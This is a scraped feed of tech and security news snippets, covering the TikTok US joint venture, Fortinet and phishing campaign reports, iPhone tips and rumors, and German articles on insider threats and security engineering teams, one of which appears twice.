A White House official confirmed that both the U.S. and Chinese governments have signed off on the arrangement.

President Trump praised the outcome in a social media post, writing that he was "so happy to have helped in saving TikTok," and thanked Chinese President Xi Jinping "for working with us and, ultimately, approving the Deal."

The new venture will operate under a seven-member, majority-American board of directors. Adam Presser, formerly TikTok's general manager and global head of operations, has been appointed CEO of the joint venture. TikTok's global chief executive Shou Zi Chew will also serve on the board.

Under the agreement, the venture will handle U.S. data protection, content moderation, and algorithm security. TikTok's recommendation algorithm – widely considered key to the app's popularity – will be retrained exclusively on U.S. user data and secured within Oracle's cloud infrastructure. Oracle will also serve as a "Trusted Security Partner" to review and validate TikTok's source code.

The deal ends years of regulatory uncertainty that began in August 2020, when Trump first tried to ban the app during his first term. Congress passed legislation in 2024 requiring ByteDance to divest TikTok's U.S. operations or face a nationwide ban. The law was upheld by the Supreme Court in January 2025. Trump has extended the deadline multiple times since then to let the negotiations play out.

TikTok has more than 200 million users in the United States. It's unclear exactly how the restructured algorithm will affect the user experience, but the app could end up working differently compared to TikTok in other countries.Tag: TikTok
This article, "TikTok Avoids US Ban as Joint Venture Deal Officially Closes" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
reporter

Fortinet Confirms Active FortiCloud SSO Bypass on Fully Patched FortiGate Firewalls

Fortinet has officially confirmed that it's working to completely plug a FortiCloud SSO authentication bypass vulnerability following reports of fresh exploitation activity on fully-patched firewalls. "In the last 24 hours, we have identified a number of cases where the exploit was to a device that had been fully upgraded to the latest release at the time of the attack, which suggested a newView the full article
Hacker News

Turn Several Live Photos into a Single Video on iPhone

Did you know it's possible to take multiple Live Photos from your iPhone's photo library and turn them into a single continuous video? Keep reading to learn how it's done.


On iPhone and iPad, Live Photos bring your pictures to life by adding a few seconds of video before and after the shot, creating a living memory rather than a static image.

While Live Photos are great on their own, it's also possible to weave several together to create a video montage. This process transforms a collection of moments into a cohesive narrative, and offers an easier way to share and relive your memories.

Whether it's a series of shots from a special event, a day out with friends, or a compilation of everyday moments, the following steps show you how to turn several Live Photos into a video that can encapsulate their essence in a way that a single photo or traditional video might not.

In the Photos app, tap the Collections icon at the bottom of the screen.
Scroll down to "Media Types," and tap Live Photos.
Tap Select in the top-right corner, then tap the Live Photos you want to include in your video so that a little checkmark appears on each one.

Tap the button with three dots in the top-right corner.
Choose Save as Video in the pop-up menu.

That's all there is to it. To watch your newly created video, return to the Library view or find it in the Videos category under Media Types.

Note that the video will be dated to when the Live Photos were originally taken, so unless you have the Sort by Recently Added option checked, they may not show as the latest video in your collection.Tag: Photos
This article, "Turn Several Live Photos into a Single Video on iPhone" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
reporter

Unterschätztes Risiko: Insider-Bedrohungen endlich ernst nehmen

Andrii Yalanskyi – shutterstock.com
Was wäre, wenn das größte Sicherheitsrisiko Ihrer Organisation bereits einen Mitarbeitendenausweis besitzt, legitim angemeldet ist und genau weiß, wie interne Prozesse funktionieren? Diese Frage ist unbequem, aber sie markiert den Ausgangspunkt für eine längst überfällige Auseinandersetzung mit Insider-Bedrohungen.

Insider Threats – der blinde Fleck

Ob auf Fachkonferenzen oder in unternehmensinternen Meetings: Wenn über Sicherheitsrisiken gesprochen wird, richtet sich der Blick fast immer reflexartig nach außen. Auf Hackergruppen und Cyberkriminelle, auf ausländische Nachrichtendienste, auf Anhänger politischer oder religiöser Gruppen und auf wirtschaftliche Konkurrenten. Die eigenen Beschäftigten kommen als Tätergruppe in der Betrachtung kaum vor. Innentäter sind in vielen Organisationen immer noch ein Tabu-Thema, gelten allenfalls als Randphänomen und einzelne „schwarze Schafe“. Diese Annahme ist bequem – und gleichzeitig hoch gefährlich. Denn sie verstellt den Blick auf ein Risiko, das strukturell, vielschichtig und hoch wirksam ist.
Dass Insider-Bedrohungen ein systematisches Sicherheitsrisiko sind, belegen empirische Daten. In einer Bitkom-Umfrage aus dem Jahr 2025 berichteten 48 Prozent der deutschen Unternehmen, dass Fälle von Datendiebstahl, Industriespionage oder Sabotage auf eigene Mitarbeitende zurückzuführen waren. Bei 25 Prozent der Unternehmen waren es unabsichtlich handelnde (ehemalige) Beschäftigte, bei 23 Prozent vorsätzlich handelnde (ehemalige) Beschäftigte. Nach Angriffen von organisierten Kriminellen und Banden (68 Prozent) sind Insider-Vergehen damit die zweithäufigsten Delikte. Andere Statistiken zeigen, dass bereits 61 Prozent der Organisationen weltweit einen Insider-Vorfall identifiziert haben und dies bei 29 Prozent zu einem Sicherheitsvorfall führte.
Diese Zahlen machen deutlich: Eine Sicherheitsstrategie, die den Fokus ausschließlich auf externe Bedrohungen legt, ist gefährlich lückenhaft. Insider-Risiken sind ein relevanter Teil der Bedrohungslandschaft und müssen in Risikoanalysen systematisch mitgedacht werden.
Insider-Gefahren werden unterschätzt
Die soziale Organisation ist ein grundlegendes Merkmal der menschlichen Evolution. Seit jeher haben sich Menschen zu Gruppen zusammengeschlossen, um gemeinsam zu jagen, Wissen zu teilen und sich gegen Bedrohungen zu verteidigen. Teil einer Gruppe zu sein, bedeutete Schutz vor Gefahren von außen und konnte das Überleben sichern. Basis für all das war gegenseitiges Vertrauen innerhalb der Gruppe.
Auch heute bildet Vertrauen die Grundlage für das Funktionieren einer Organisation. Es ist Ausgangspunkt für eine konstruktive, effiziente und erfolgreiche Zusammenarbeit. Um ihre Arbeitsaufgaben zu erfüllen, benötigen Mitarbeitende Zutritt zum Firmengelände, Zugang zu Datenbanken und Bestellsystemen sowie Zugriff auf Informationen über Produkte, Prozesse, Lieferanten, Dienstleister und Kunden. Arbeitgeber statten Beschäftigte dazu mit den notwendigen Berechtigungen aus und vertrauen im Gegenzug auf die Loyalität und Integrität ihrer Mitarbeitenden. Das sich jemand von innen bewusst und vorsätzlich gegen die eigene Organisation wenden könnte, ist für viele Menschen dabei nicht vorstellbar und moralisch schlichtweg verwerflich. Die Folge: Die Gefahr wird ausgeblendet. Blindes Vertrauen macht Organisationen jedoch verwundbar.
Insider-Bedrohungen sind gefährlich
Insider verfügen über legitime Berechtigungen und haben ein tiefes Wissen über Infrastruktur, Systeme, Prozesse und Stakeholder. Gleichzeitig haben sie auch die Schwachstellen einer Organisation sehr genau im Blick. Sie kennen kritische Assets, wissen, wo sensible Daten liegen oder welche Prozesse besonders verwundbar sind. Insider wissen zudem, welche Kontrollmechanismen existieren und welche nicht. Auch kennen sie sich damit aus, wie sie Sicherheitslücken ausnutzen und Kontrollen umgehen können. Das ist ein struktureller Vorteil aller Insider.
Doch erst die missbräuchliche Verwendung von Berechtigungen macht einen Insider zum Innentäter. Diese zu erkennen ist allerdings schwierig, weil ihre Handlungen unauffällig und legitim wirken. Zugriffe erfolgen mit gültigen Berechtigungen, Prozesse werden formal eingehalten, Auffälligkeiten sind subtil. Klassische Sicherheitsmechanismen schlagen hier oft nicht an.
So können Innentäter oftmals über einen längeren Zeitraum agieren, ohne entdeckt zu werden. Typische vorsätzliche Angriffsformen von innen sind Betrug, Diebstahl von Informationen und physischen Gütern, Spionage, Sabotage sowie Gewalt. Die Auslöser für diese Taten sind vielfältig und reichen von emotionalen und situativen Belastungen, Unzufriedenheit und Frust, Opportunismus, finanziellen Interessen bis hin zu Loyalitätskonflikten. Neben solchen illoyalen Insidern gibt es zudem professionell eingeschleuste Innentäter, die beispielsweise im Auftrag eines ausländischen Nachrichtendienstes agieren.
Im Gegensatz zu diesen beiden Tätergruppen gibt es eine dritte Personengruppe: Das sind Beschäftigte, die zum Beispiel in der Hektik des Alltags auf einen Link in einer Phishing-E-Mail klicken, aus Nachlässigkeit eine E-Mail an einen falschen Adressaten senden oder von der Firma nicht zugelassene KI-Tools verwenden, um Arbeitszeit zu sparen. Ob man bei dieser letzten Gruppe, die ohne böswillige Absicht und kriminelle Energie handelt, von Innentätern sprechen und diese so behandeln kann und will, muss jede Organisation für sich selbst definieren.
Das Schadensausmaß bei Angriffen von innen kann massiv sein. Schäden durch Innentäter wirken häufig nachhaltiger als externe Angriffe, sowohl finanziell, reputativ als auch organisatorisch. Je nach Schwere des Angriffs kann zudem ein organisationales Trauma entstehen, zum Beispiel nach einem Amoklauf.
Klassische Sicherheitsmaßnahmen reichen nicht aus
Technische Systeme leisten einen wichtigen Beitrag zur Erkennung von Insider-Risiken, stoßen dabei jedoch an klare Grenzen. Tools wie Identity and Access Management (IAM), Data Loss Prevention (DLP) oder User and Entity Behaviour Analytics (UEBA) können Auffälligkeiten und Abweichungen identifizieren, nicht jedoch die dahinterliegenden Emotionen, Motive oder Intentionen. Technik kann damit Hinweise liefern und Symptome sichtbar machen, doch ein erheblicher Teil von Insider-Bedrohungen bleibt für technische Systeme unsichtbar. Denken Sie an den Diebstahl von Papierakten, die Installation von Mini-Kameras zur Überwachung von Computerbildschirmen oder die Sabotage von physischer Infrastruktur. Insider-Bedrohungen sind komplex und keinesfalls ein reines IT-Thema. Auch andere Abteilungen wie die Unternehmenssicherheit, HR, Compliance, Legal, interne Kommunikation und das Management sind relevante Stakeholder.
Ein weiteres zentrales Problem ist die fehlende klare Risk Ownership für Insider Threats. Während der Schutz vor externen Angriffen in vielen Organisationen fest verankert ist – oft mit eigenen Abteilungen, klar definierten Verantwortlichkeiten und etablierten Prozessen – fehlt ein vergleichbares Pendant für Bedrohungen aus dem Inneren häufig vollständig. Ohne eindeutige Zuständigkeit lassen sich Insider-Risiken weder systematisch bewerten noch präventiv steuern.
Die Folge von Technikfixierung, Silodenken und fehlender Zuständigkeit: Punktuelle Einzelmaßnahmen wie strengere Zugriffsrechte, zusätzliche Kontrollen und neue Tools. Diese Maßnahmen sind nicht falsch, aber sie bilden nur ein isoliertes Fragment eines systematischen Risikomanagements.
Was ein moderner Umgang mit Insider Threats bedeutet
Die Unsicherheit im Umgang mit Insider-Bedrohungen zeigt sich auch in Umfragen: Während es unter Cybersecurity-Experten einen deutlichen Anstieg der Besorgnis über böswillige Insider, von 60 Prozent im Jahr 2019 auf 74 Prozent im Jahr 2024, gibt, haben nur 29 Prozent der Befragten das Gefühl, über die richtigen Werkzeuge zum Schutz ihrer Organisation zu verfügen. Was oftmals fehlt, ist eine übergreifende Perspektive: Welche Risiken sind für uns wirklich kritisch? Wie fügt sich das Thema in bestehende Risiko-, Governance- und Prozessstrukturen ein? Wer trägt Verantwortung?
Ein zeitgemäßer Umgang mit Insider-Bedrohungen beginnt nicht mit Misstrauen, sondern mit Risikobewusstsein. Es geht nicht darum, Mitarbeitende unter Generalverdacht zu stellen, sondern Risiken systematisch zu verstehen und verantwortungsvoll zu steuern.
Zentral ist der Perspektivwechsel: von Reaktion zu Prävention, von Einzelfällen zu Strukturen, von Technik zu Organisation. Ein moderner Ansatz verbindet Kultur, Struktur und Verantwortung. Er stärkt Vertrauen und Compliance, indem klare Regeln und Prozesse etabliert werden. Außerdem ermöglicht er nachhaltige Resilienz, statt nur auf Vorfälle zu reagieren. Der Appell ist eindeutig: Wegsehen erhöht das Risiko. Hinschauen schafft Handlungsfähigkeit.
Fazit: Warum jetzt gehandelt werden muss
Innentätermanagement ist kein Produkt und kein Kontrollregime. Es ist ein menschenzentrierter Managementansatz, der Vertrauen schützt, indem er Risiken transparent macht und bewusst adressiert. Mit den europäischen Richtlinien NIS2 und CER rückt das Risikomanagement stärker in den Fokus. Noch immer wird Sicherheit häufig als eine Art Außenverteidigung verstanden. Was dabei oft übersehen wird: Ein erheblicher Teil der Risiken entsteht innerhalb von Organisationen.
Innentätermanagement ist damit keine optionale Ergänzung mehr, sondern Teil verantwortungsvoller Unternehmenssteuerung. Die entscheidende Frage lautet nicht, ob Insider-Risiken existieren, sondern ob Organisationen bereit sind, sie bewusst zu managen. (jm)
View the full article
CSOonline

Unterschätztes Risiko: Insider-Bedrohungen endlich ernst nehmen

Andrii Yalanskyi – shutterstock.com
Was wäre, wenn das größte Sicherheitsrisiko Ihrer Organisation bereits einen Mitarbeitendenausweis besitzt, legitim angemeldet ist und genau weiß, wie interne Prozesse funktionieren? Diese Frage ist unbequem, aber sie markiert den Ausgangspunkt für eine längst überfällige Auseinandersetzung mit Insider-Bedrohungen.

Insider Threats – der blinde Fleck

Ob auf Fachkonferenzen oder in unternehmensinternen Meetings: Wenn über Sicherheitsrisiken gesprochen wird, richtet sich der Blick fast immer reflexartig nach außen. Auf Hackergruppen und Cyberkriminelle, auf ausländische Nachrichtendienste, auf Anhänger politischer oder religiöser Gruppen und auf wirtschaftliche Konkurrenten. Die eigenen Beschäftigten kommen als Tätergruppe in der Betrachtung kaum vor. Innentäter sind in vielen Organisationen immer noch ein Tabu-Thema, gelten allenfalls als Randphänomen und einzelne „schwarze Schafe“. Diese Annahme ist bequem – und gleichzeitig hoch gefährlich. Denn sie verstellt den Blick auf ein Risiko, das strukturell, vielschichtig und hoch wirksam ist.
Dass Insider-Bedrohungen ein systematisches Sicherheitsrisiko sind, belegen empirische Daten. In einer Bitkom-Umfrage aus dem Jahr 2025 berichteten 48 Prozent der deutschen Unternehmen, dass Fälle von Datendiebstahl, Industriespionage oder Sabotage auf eigene Mitarbeitende zurückzuführen waren. Bei 25 Prozent der Unternehmen waren es unabsichtlich handelnde (ehemalige) Beschäftigte, bei 23 Prozent vorsätzlich handelnde (ehemalige) Beschäftigte. Nach Angriffen von organisierten Kriminellen und Banden (68 Prozent) sind Insider-Vergehen damit die zweithäufigsten Delikte. Andere Statistiken zeigen, dass bereits 61 Prozent der Organisationen weltweit einen Insider-Vorfall identifiziert haben und dies bei 29 Prozent zu einem Sicherheitsvorfall führte.
Diese Zahlen machen deutlich: Eine Sicherheitsstrategie, die den Fokus ausschließlich auf externe Bedrohungen legt, ist gefährlich lückenhaft. Insider-Risiken sind ein relevanter Teil der Bedrohungslandschaft und müssen in Risikoanalysen systematisch mitgedacht werden.
Insider-Gefahren werden unterschätzt
Die soziale Organisation ist ein grundlegendes Merkmal der menschlichen Evolution. Seit jeher haben sich Menschen zu Gruppen zusammengeschlossen, um gemeinsam zu jagen, Wissen zu teilen und sich gegen Bedrohungen zu verteidigen. Teil einer Gruppe zu sein, bedeutete Schutz vor Gefahren von außen und konnte das Überleben sichern. Basis für all das war gegenseitiges Vertrauen innerhalb der Gruppe.
Auch heute bildet Vertrauen die Grundlage für das Funktionieren einer Organisation. Es ist Ausgangspunkt für eine konstruktive, effiziente und erfolgreiche Zusammenarbeit. Um ihre Arbeitsaufgaben zu erfüllen, benötigen Mitarbeitende Zutritt zum Firmengelände, Zugang zu Datenbanken und Bestellsystemen sowie Zugriff auf Informationen über Produkte, Prozesse, Lieferanten, Dienstleister und Kunden. Arbeitgeber statten Beschäftigte dazu mit den notwendigen Berechtigungen aus und vertrauen im Gegenzug auf die Loyalität und Integrität ihrer Mitarbeitenden. Das sich jemand von innen bewusst und vorsätzlich gegen die eigene Organisation wenden könnte, ist für viele Menschen dabei nicht vorstellbar und moralisch schlichtweg verwerflich. Die Folge: Die Gefahr wird ausgeblendet. Blindes Vertrauen macht Organisationen jedoch verwundbar.
Insider-Bedrohungen sind gefährlich
Insider verfügen über legitime Berechtigungen und haben ein tiefes Wissen über Infrastruktur, Systeme, Prozesse und Stakeholder. Gleichzeitig haben sie auch die Schwachstellen einer Organisation sehr genau im Blick. Sie kennen kritische Assets, wissen, wo sensible Daten liegen oder welche Prozesse besonders verwundbar sind. Insider wissen zudem, welche Kontrollmechanismen existieren und welche nicht. Auch kennen sie sich damit aus, wie sie Sicherheitslücken ausnutzen und Kontrollen umgehen können. Das ist ein struktureller Vorteil aller Insider.
Doch erst die missbräuchliche Verwendung von Berechtigungen macht einen Insider zum Innentäter. Diese zu erkennen ist allerdings schwierig, weil ihre Handlungen unauffällig und legitim wirken. Zugriffe erfolgen mit gültigen Berechtigungen, Prozesse werden formal eingehalten, Auffälligkeiten sind subtil. Klassische Sicherheitsmechanismen schlagen hier oft nicht an.
So können Innentäter oftmals über einen längeren Zeitraum agieren, ohne entdeckt zu werden. Typische vorsätzliche Angriffsformen von innen sind Betrug, Diebstahl von Informationen und physischen Gütern, Spionage, Sabotage sowie Gewalt. Die Auslöser für diese Taten sind vielfältig und reichen von emotionalen und situativen Belastungen, Unzufriedenheit und Frust, Opportunismus, finanziellen Interessen bis hin zu Loyalitätskonflikten. Neben solchen illoyalen Insidern gibt es zudem professionell eingeschleuste Innentäter, die beispielsweise im Auftrag eines ausländischen Nachrichtendienstes agieren.
Im Gegensatz zu diesen beiden Tätergruppen gibt es eine dritte Personengruppe: Das sind Beschäftigte, die zum Beispiel in der Hektik des Alltags auf einen Link in einer Phishing-E-Mail klicken, aus Nachlässigkeit eine E-Mail an einen falschen Adressaten senden oder von der Firma nicht zugelassene KI-Tools verwenden, um Arbeitszeit zu sparen. Ob man bei dieser letzten Gruppe, die ohne böswillige Absicht und kriminelle Energie handelt, von Innentätern sprechen und diese so behandeln kann und will, muss jede Organisation für sich selbst definieren.
Das Schadensausmaß bei Angriffen von innen kann massiv sein. Schäden durch Innentäter wirken häufig nachhaltiger als externe Angriffe, sowohl finanziell, reputativ als auch organisatorisch. Je nach Schwere des Angriffs kann zudem ein organisationales Trauma entstehen, zum Beispiel nach einem Amoklauf.
Klassische Sicherheitsmaßnahmen reichen nicht aus
Technische Systeme leisten einen wichtigen Beitrag zur Erkennung von Insider-Risiken, stoßen dabei jedoch an klare Grenzen. Tools wie Identity and Access Management (IAM), Data Loss Prevention (DLP) oder User and Entity Behaviour Analytics (UEBA) können Auffälligkeiten und Abweichungen identifizieren, nicht jedoch die dahinterliegenden Emotionen, Motive oder Intentionen. Technik kann damit Hinweise liefern und Symptome sichtbar machen, doch ein erheblicher Teil von Insider-Bedrohungen bleibt für technische Systeme unsichtbar. Denken Sie an den Diebstahl von Papierakten, die Installation von Mini-Kameras zur Überwachung von Computerbildschirmen oder die Sabotage von physischer Infrastruktur. Insider-Bedrohungen sind komplex und keinesfalls ein reines IT-Thema. Auch andere Abteilungen wie die Unternehmenssicherheit, HR, Compliance, Legal, interne Kommunikation und das Management sind relevante Stakeholder.
Ein weiteres zentrales Problem ist die fehlende klare Risk Ownership für Insider Threats. Während der Schutz vor externen Angriffen in vielen Organisationen fest verankert ist – oft mit eigenen Abteilungen, klar definierten Verantwortlichkeiten und etablierten Prozessen – fehlt ein vergleichbares Pendant für Bedrohungen aus dem Inneren häufig vollständig. Ohne eindeutige Zuständigkeit lassen sich Insider-Risiken weder systematisch bewerten noch präventiv steuern.
Die Folge von Technikfixierung, Silodenken und fehlender Zuständigkeit: Punktuelle Einzelmaßnahmen wie strengere Zugriffsrechte, zusätzliche Kontrollen und neue Tools. Diese Maßnahmen sind nicht falsch, aber sie bilden nur ein isoliertes Fragment eines systematischen Risikomanagements.
Was ein moderner Umgang mit Insider Threats bedeutet
Die Unsicherheit im Umgang mit Insider-Bedrohungen zeigt sich auch in Umfragen: Während es unter Cybersecurity-Experten einen deutlichen Anstieg der Besorgnis über böswillige Insider, von 60 Prozent im Jahr 2019 auf 74 Prozent im Jahr 2024, gibt, haben nur 29 Prozent der Befragten das Gefühl, über die richtigen Werkzeuge zum Schutz ihrer Organisation zu verfügen. Was oftmals fehlt, ist eine übergreifende Perspektive: Welche Risiken sind für uns wirklich kritisch? Wie fügt sich das Thema in bestehende Risiko-, Governance- und Prozessstrukturen ein? Wer trägt Verantwortung?
Ein zeitgemäßer Umgang mit Insider-Bedrohungen beginnt nicht mit Misstrauen, sondern mit Risikobewusstsein. Es geht nicht darum, Mitarbeitende unter Generalverdacht zu stellen, sondern Risiken systematisch zu verstehen und verantwortungsvoll zu steuern.
Zentral ist der Perspektivwechsel: von Reaktion zu Prävention, von Einzelfällen zu Strukturen, von Technik zu Organisation. Ein moderner Ansatz verbindet Kultur, Struktur und Verantwortung. Er stärkt Vertrauen und Compliance, indem klare Regeln und Prozesse etabliert werden. Außerdem ermöglicht er nachhaltige Resilienz, statt nur auf Vorfälle zu reagieren. Der Appell ist eindeutig: Wegsehen erhöht das Risiko. Hinschauen schafft Handlungsfähigkeit.
Fazit: Warum jetzt gehandelt werden muss
Innentätermanagement ist kein Produkt und kein Kontrollregime. Es ist ein menschenzentrierter Managementansatz, der Vertrauen schützt, indem er Risiken transparent macht und bewusst adressiert. Mit den europäischen Richtlinien NIS2 und CER rückt das Risikomanagement stärker in den Fokus. Noch immer wird Sicherheit häufig als eine Art Außenverteidigung verstanden. Was dabei oft übersehen wird: Ein erheblicher Teil der Risiken entsteht innerhalb von Organisationen.
Innentätermanagement ist damit keine optionale Ergänzung mehr, sondern Teil verantwortungsvoller Unternehmenssteuerung. Die entscheidende Frage lautet nicht, ob Insider-Risiken existieren, sondern ob Organisationen bereit sind, sie bewusst zu managen. (jm)
View the full article
CSOonline

TikTok Forms U.S. Joint Venture to Continue Operations Under 2025 Executive Order

TikTok on Friday officially announced that it formed a joint venture that will allow the hugely popular video-sharing application to continue operating in the U.S. The new venture, named TikTok USDS Joint Venture LLC, has been established in compliance with the Executive Order signed by U.S. President Donald Trump in September 2025, the platform said. The new deal will see TikTok's ChineseView the full article
Hacker News

Phishing Attack Uses Stolen Credentials to Install LogMeIn RMM for Persistent Access

Cybersecurity researchers have disclosed details of a new dual-vector campaign that leverages stolen credentials to deploy legitimate Remote Monitoring and Management (RMM) software for persistent remote access to compromised hosts. "Instead of deploying custom viruses, attackers are bypassing security perimeters by weaponizing the necessary IT tools that administrators trust," KnowBe4 ThreatView the full article
Hacker News

Apple Rejects Blame for Setapp Mobile App Marketplace Closure, Accuses EU of 'Political Delay Tactics'

Apple has accused the European Commission of using "political delay tactics" to manufacture a reason to investigate and fine the company, according to Bloomberg.


The statement appears designed to get ahead of reports that the EC is preparing to cite Apple as the reason behind the imminent closure of Setapp Mobile, the third-party iOS app marketplace that announced its shutdown earlier this month.

MacPaw, the developer behind Setapp Mobile, said the service would close on February 16 due to "still-evolving and complex business terms" for alternative app stores in the EU.

Responding to the closure, the EC is preparing to say that Apple "has not rolled out changes to address the key issues concerning its business terms, including their complexity," according to remarks seen by Bloomberg.

However, Apple says the commission itself is blocking those changes.

"The European Commission has refused to let us implement the very changes that they requested," Apple said in a statement given to the publication. "In October, we submitted a formal compliance plan and they have yet to respond."

Apple was required to allow third-party app marketplaces on iOS in the EU under the Digital Markets Act, which took effect more than two years ago. The company charges fees on those marketplaces, including a Core Technology Fee of €0.50 per install over one million. As a result of discussions with the EC last year, Apple said it planned to change its fee structure to a 5% revenue share to make it more economical for developers. Apple claims that change hasn't been implemented because the EC hasn't approved its compliance plan.

Apple also disputed that Setapp is shutting down because of its policies, and claimed there is "no demand" for alternative App Stores in the EU. There are five other alternative marketplaces currently available, with the most prominent being the Epic Games Store.Tags: European Commission, European Union, Setapp
This article, "Apple Rejects Blame for Setapp Mobile App Marketplace Closure, Accuses EU of 'Political Delay Tactics'" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
reporter

Apple Invites Creators to LA Event on January 27-29 That Could Coincide With MacBook Pro Announcement

Apple has sent out invites to select creators for an "Apple Experience" in Los Angeles, California, scheduled for January 27 to 29. The event has sparked speculation that Apple will also announce new MacBook Pro models with M5 Pro and M5 Max chips.


Creator Petr Mara shared an image of his invite on Instagram. Mara was also invited to an Apple event in September to test out the latest iPhone 17 Pro models.

Apple's new Creator Studio bundle of creative apps, announced last week, launches on Wednesday, January 28. Given the bundle includes several professional Mac apps, such Final Cut Pro, Logic Pro, and Pixelmator Pro, there's a good chance that Apple will use the coinciding event as an opportunity to release new MacBook Pro models too.

Also, Apple's next quarterly earnings call is scheduled for Thursday, January 29, and the company has introduced new products shortly before these calls on several occasions.

Apple in October updated the base 14-inch MacBook Pro with an M5 chip, so the higher-end models are due an upgrade. Beyond the processor, the only other notable change to the base model was PCIe 5.0 storage. According to Apple, this delivers up to twice the SSD read and write speeds of the previous generation.
This article, "Apple Invites Creators to LA Event on January 27-29 That Could Coincide With MacBook Pro Announcement" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
reporter

Microsoft Flags Multi-Stage AitM Phishing and BEC Attacks Targeting Energy Firms

Microsoft has warned of a multi‑stage adversary‑in‑the‑middle (AitM) phishing and business email compromise (BEC) campaign targeting multiple organizations in the energy sector. "The campaign abused SharePoint file‑sharing services to deliver phishing payloads and relied on inbox rule creation to maintain persistence and evade user awareness," the Microsoft Defender Security Research Team said.View the full article
Hacker News

iPhone 18 Pro: Leaker Reveals Alleged Size of Smaller Dynamic Island

For now, rumors have settled on the iPhone 18 Pro and iPhone 18 Pro Max featuring a smaller Dynamic Island, and now a leaker has revealed its alleged size.

iPhone 18 Pro with a smaller Dynamic Island (mockup via Ice Universe)
The account "Ice Universe" today claimed the Dynamic Island cutout on the iPhone 18 Pro models will be approximately 35% narrower than it is on the iPhone 17 Pro models. Specifically, they said it will have a width of around 13.5mm, down from around 20.7mm, and they shared the mockup image above to show what it would look like.

An earlier report from The Information indicated that the iPhone 18 Pro models will feature under-screen Face ID. As a result, the publication said the devices would have only a hole-punch front camera in the top-left corner of the screen, rather than the current pill-shaped cutout for the front camera and Face ID sensors. However, the latest word is that only Face ID's flood illuminator will be moved under the screen this year, meaning that Apple will only be able to shrink the pill-shaped cutout rather than remove it entirely.

According to display industry expert Ross Young, who has a very good track record, the smaller Dynamic Island will last through at least 2027. So, it could take at least a few more years until the iPhone finally gets a truly seamless display.

"Ice Universe" has leaked some accurate iPhone dimensions in the past, giving them credibility, but they do not have a perfect track record.

Apple is expected to unveil the iPhone 18 Pro models in September.Related Roundup: iPhone 18Tags: Dynamic Island, Ice UniverseRelated Forum: iPhone
This article, "iPhone 18 Pro: Leaker Reveals Alleged Size of Smaller Dynamic Island" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
reporter

10 wichtige Security-Eigenschaften: So setzen Sie die Kraft Ihres IT-Sicherheitstechnik-Teams frei

Lesen Sie, worauf es bei der Zusammenarbeit zwischen Ihrem IT-Security- und Engineering-Team ankommt.
Foto: Lipik Stock Media – shutterstock.com
Security-Teams bestehen in erster Linie aus Mitarbeitern, die für den Betrieb und die Einhaltung von Vorschriften und Richtlinien zuständig sind. IT-Sicherheitstechnik-Teams, neudeutsch Security-Engineering-Teams, hingegen sind Konstrukteure. Sie entwickeln Dienste, automatisieren Prozesse und optimieren Bereitstellungen, um das zentrale IT-Sicherheitsteam und seine Stakeholder zu unterstützen. Das Security-Engineering-Team bestehen in der Regel aus Software- und Infrastrukturingenieuren, Architekten und Produktmanagern.
Technische Fähigkeiten im Bereich IT-Sicherheitstechnik
Security Engineering ist im Wesentlichen eine technische Disziplin, so dass eines der grundlegenden Elemente dieser Rolle natürlich in der Technologie verwurzelt ist. Dies sind die wesentlichen Fähigkeiten, die CISOs in ihren Security-Engineering-Teams vermitteln und entwickeln sollten:
Verstehen des technischen Umfelds
Dass es von entscheidender Bedeutung ist, die technische Umgebung zu verstehen und in ihr zu arbeiten, scheint eine Selbstverständlichkeit zu sein. Doch wenn ein Unternehmen beispielsweise Dienste in Kubernetes bereitstellt und das Technikteam noch nie mit Containern gearbeitet hat, ist das ein Problem. Ein hohes Maß an technischem Verständnis der gesamten IT-Umgebung wirkt sich positiv auf das Security-Team aus.
Ein Kontrapunkt dazu ist die Förderung eines vielfältigen Teams in Bezug auf die Fähigkeiten, Problemlösungsperspektiven und Erfahrungsstufen in den verschiedenen Bereichen eines Unternehmens. Es gibt natürlich viele Möglichkeiten, diese Vielfalt in einem Team anzustreben und zu fördern, vom Geschlecht und der ethnischen Zugehörigkeit über den Bildungshintergrund bis hin zu früheren Berufserfahrungen und dem Alter. Diversität kann die kreative Energie eines Teams stark erhöhen, wenn Ideen in Frage gestellt, debattiert und wiederholt werden.
Allerdings sollten Führungskräfte mit der Vielfalt an Perspektiven und Erfahrungen sorgfältig umgehen. Ein übermäßiges Maß an Variation und Reibung im Denk- und Kooperationsprozess kann zum Gegenteil der gewünschten Wirkung führen. Häufig kommt es zu einer Analyse-Paralyse, bei der die Teams in einem Zustand des Nachdenkens über das Tun statt des Tuns stecken bleiben. Ein ähnlicher Zustand, der sich aus übermäßig unterschiedlichen Teams ergeben kann, ist eine komplexe Reihe von voneinander abhängigen Ergebnissen, die miteinander verbundene Fehlerbedingungen aufweisen.
Den gesamten Stack beherrschen
IT-Sicherheitstechnikteams sollten in der Lage sein, die von ihnen entwickelten Dienste zu erstellen und zu betreiben. Dieses Maß an Eigenverantwortung innerhalb einer Gruppe ist aus Sicht der technischen Kompetenz und aus kultureller Sicht von entscheidender Bedeutung, da es den Ton in Bezug auf die Verantwortlichkeit angibt. Technisch gesehen wird ein Team, das in der Lage ist, seine Dienste selbst zu verwalten, die Infrastruktur, die CI/CD-Tools, die Security-Tools, den Anwendungscode, die Deployments und die von einem Dienst ausgehenden operativen Telemetriedaten kompetent verwalten. Darüber hinaus sind die Fähigkeiten, die hinter der Unterstützung durch ein Team stehen, in hohem Maße übertragbar, um andere Gruppen im Unternehmen zu unterstützen.
Das Entwicklererlebnis miteinbeziehen (DevX)
Security-Teams, die das Entwickler-Tool DevX verstehen, annehmen und optimieren, werden wahrscheinlich besser zusammenarbeiten. Darüber hinaus wird ein besonderer Schwerpunkt auf der Beseitigung von Reibungsverlusten liegen. Reibung führt dazu, dass Dinge länger dauern und mehr kosten, dass sich Lernzyklen verlängern und dass Frustration auftritt. Weniger Reibung wird dazu führen, dass die Dinge im Allgemeinen viel besser ablaufen.
